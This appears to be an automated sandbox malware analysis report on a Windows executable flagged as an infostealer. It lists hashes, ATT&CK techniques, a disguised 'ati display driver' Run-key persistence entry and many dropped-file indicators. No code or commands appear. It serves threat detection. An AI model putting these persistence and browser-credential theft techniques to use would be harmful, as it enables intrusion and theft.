b804e9766e2ebc1e7665bb4b6ff117f6e667340b539e30453c40715b84d9a9c1

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28-04-2024 11:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
Size

15.4MB
MD5

0522cdb03aff0504fad3fd3f4997dacb
SHA1

82949dfd97dc43028fca10988cc18ccd48c1237e
SHA256

b804e9766e2ebc1e7665bb4b6ff117f6e667340b539e30453c40715b84d9a9c1
SHA512

bd3439490d1fe4e94dcc6e1d77378c144f0c28a3d12ba8cab6646f43d20a9107b9434bb4fe96adba0260fd41a0e8defdf44dc1f92fd6bdb5ec6d6e4c77c78e49
SSDEEP

98304:XX77GBfWgVh+Cgad1S3imxJWIfzjTpC5V3:vGBfWqjd1nyzPpCL3

Score

8^/10

discovery persistence spyware stealer

Malware Config

Signatures

Contacts a large (726) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@"	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe

Drops file in System32 directory 64 IoCs

Processes:

0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe

description	ioc	process
File created	C:\Windows\SysWOW64\InstallShield\setup.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\schtasks.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\setup16.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SystemPropertiesDataExecutionPrevention.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\upnpcont.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\calc.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\migwiz\MigSetup.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\recover.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\icardagt.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\RmClient.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\RunLegacyCPLElevated.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\winrshost.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\comp.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\diskpart.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\fc.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\mcbuilder.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\xwizard.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\hdwwiz.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\LocationNotifications.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\MigAutoPlay.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SetIEInstalledDate.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Utilman.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\ARP.EXE-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\diskraid.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\net1.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\rasphone.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\msinfo32.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\regedit.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\sdiagnhost.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\taskeng.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wininit.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\sc.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wusa.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\DWWIN.EXE-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\dxdiag.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\IME\IMEJP10\IMJPUEX.EXE-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Mystify.scr-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\ntoskrnl.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\IME\IMEJP10\imjppdmg.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Msdtc\Trace\msdtcvtr.bat	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\replace.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SearchProtocolHost.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Ribbons.scr	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\where.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\diskpart.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\getmac.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\label.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\mstsc.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\ndadmin.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\AtBroker.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Utilman.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\sethc.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Bubbles.scr_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\cmmon32.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\credwiz.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\MRINFO.EXE_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\NAPSTAT.EXE_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\netsh.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\setx.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\TapiUnattend.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\WSManHTTPConfig.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\cttune.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\PhotoScreensaver.scr-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe

Drops file in Program Files directory 64 IoCs

Processes:

0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe

description	ioc	process
File created	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOXMLED.EXE	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Windows Media Player\WMPDMC.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\ink\mip.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\javaws.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Setup.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2launcher.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Mozilla Firefox\plugin-container.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Games\FreeCell\FreeCell.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Internet Explorer\ielowutil.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\MSTORE.EXE_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\vsta_ep32.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\GROOVEMN.EXE-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\SCANPST.EXE-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\unpack200.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Games\Hearts\Hearts.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Windows Mail\wabmig.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jconsole.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\jp2launcher.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\keytool.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\servertool.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\javacpl.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\jp2launcher.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Windows Mail\WinMail.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPREARM.EXE_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\java.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Mozilla Firefox\crashreporter.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\rmid.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Windows Media Player\wmpenc.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\bckgzm.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Windows Media Player\wmpshare.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\SmartTagInstall.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Windows Media Player\wmlaunch.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\policytool.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Games\Chess\Chess.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Updater6\Adobe_Updater.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLSERVER.EXE	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jinfo.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\klist.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jre7\bin\keytool.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Mozilla Firefox\private_browsing.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\chrome_installer.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\DVD Maker\DVDMaker.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Internet Explorer\iediagcmd.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe

Drops file in Windows directory 64 IoCs

Processes:

0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe

description	ioc	process
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-com-complus-setup_31bf3856ad364e35_6.1.7600.16385_none_459ccaf008ff34f6\mtstocom.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_6.1.7600.16385_none_d911df4e81059b22\attrib.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_6.1.7601.17514_none_e46b048a01806891\msinfo32.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-muicachebuilder_31bf3856ad364e35_6.1.7601.17514_none_7832a1aacb77df29\mcbuilder.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-p..ting-lprportmonitor_31bf3856ad364e35_6.1.7601.17514_none_1229a6f0546e2346\lpq.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_6.1.7601.17514_none_42d65ed50fa3c682\query.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-net-command-line-tool_31bf3856ad364e35_6.1.7600.16385_none_5208a7a3d3caa54c\net.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-setx_31bf3856ad364e35_6.1.7600.16385_none_ac4d2bf27a63f85f\setx.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-winrsplugins_31bf3856ad364e35_6.1.7600.16385_none_160ccc8a92fae520\winrshost.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_6.1.7601.17514_none_533cd4f8150e6a86\RMActivate_ssp_isv.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-t..commandlinetoolsmqq_31bf3856ad364e35_6.1.7600.16385_none_851e6308c5b62529\qwinsta.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-eudcedit_31bf3856ad364e35_6.1.7601.17514_none_b7be8a14d61db17a\eudcedit.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-s..nboxgames-solitaire_31bf3856ad364e35_6.1.7600.16385_none_d1124c00155dfd14\Solitaire.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-s..up-drivepreparation_31bf3856ad364e35_6.1.7601.17514_none_ff178cca7f9d03eb\BdeHdCfg.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-sonic-sbeserver_31bf3856ad364e35_6.1.7601.17514_none_7b380cb06fd9d81d\SBEServer.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\wow64_microsoft-windows-i..lified-chinese-core_31bf3856ad364e35_6.1.7601.17514_none_808c0da292f3ca46\IMSCPROP.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-directshow-dvdupgrd_31bf3856ad364e35_6.1.7600.16385_none_7d9cbcec3df8da86\dvdupgrd.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-defrag-cmdline_31bf3856ad364e35_6.1.7600.16385_none_2370c162e00680c3\Defrag.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-ieinstal_31bf3856ad364e35_11.2.9600.16428_none_caf2ec2ca6b08f27\ieinstal.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_netfx-clr_ilasm_exe_b03f5f7f11d50a3a_6.1.7601.17514_none_8fbf4b0735f59a32\ilasm.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_6.1.7601.17514_none_04d9defd57c1f6bf\rrinstaller.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-adaptertroubleshooter_31bf3856ad364e35_6.1.7600.16385_none_d1d79dd7e49a786f\AdapterTroubleshooter.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\assembly\GAC_MSIL\loadmxf\6.1.0.0__31bf3856ad364e35\loadmxf.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\misc.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-tasklist_31bf3856ad364e35_6.1.7600.16385_none_843823d87402ab36\tasklist.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-w..pdateclient-activex_31bf3856ad364e35_7.5.7601.17514_none_af500e3c7fc49bc4\wuapp.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\assembly\GAC_64\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-help-client_31bf3856ad364e35_6.1.7600.16385_none_c80d81c947c7b794\HelpPane.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_6.1.7601.17514_none_42d65ed50fa3c682\tsdiscon.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_netfx-vb_compiler_b03f5f7f11d50a3a_6.1.7601.17514_none_cc9e34fd4e687b15\vbc.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-isoburn_31bf3856ad364e35_6.1.7601.17514_none_e83a110af77d5aa7\isoburn.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_netfx-csharp_compiler_csc_b03f5f7f11d50a3a_6.1.7600.16385_none_d2fff1dae966863c\csc.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\fveupdate.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-anytime-upgrade_31bf3856ad364e35_6.1.7600.16385_none_fb591b6cf023ade3\WindowsAnytimeUpgrade.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-certutil_31bf3856ad364e35_6.1.7600.16385_none_b55b5e1094b0283d\certutil.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_wpf-presentationhostexe_31bf3856ad364e35_6.2.7601.17514_none_3a2a6a811d2b5065\PresentationHost.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_6.1.7601.17514_none_73e472e09a1a05d1\wmpconfig.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-consolehost_31bf3856ad364e35_6.1.7601.17932_none_d26a33ec18cb49c4\conhost.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\wow64_microsoft-windows-bth-user_31bf3856ad364e35_6.1.7601.17514_none_cd93efad202e5fb6\bthudtask.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-netsh_31bf3856ad364e35_6.1.7600.16385_none_bb95e7e51189d8f9\netsh.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\wow64_microsoft-windows-w..pdateclient-activex_31bf3856ad364e35_7.5.7601.17514_none_b9a4b88eb4255dbf\wuapp.exe_	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-b..re-memorydiagnostic_31bf3856ad364e35_6.1.7601.17514_none_da3cb85562df73c9\memtest.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe-	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe	0522cdb03aff0504fad3fd3f4997dacb_JaffaCakes118.exe
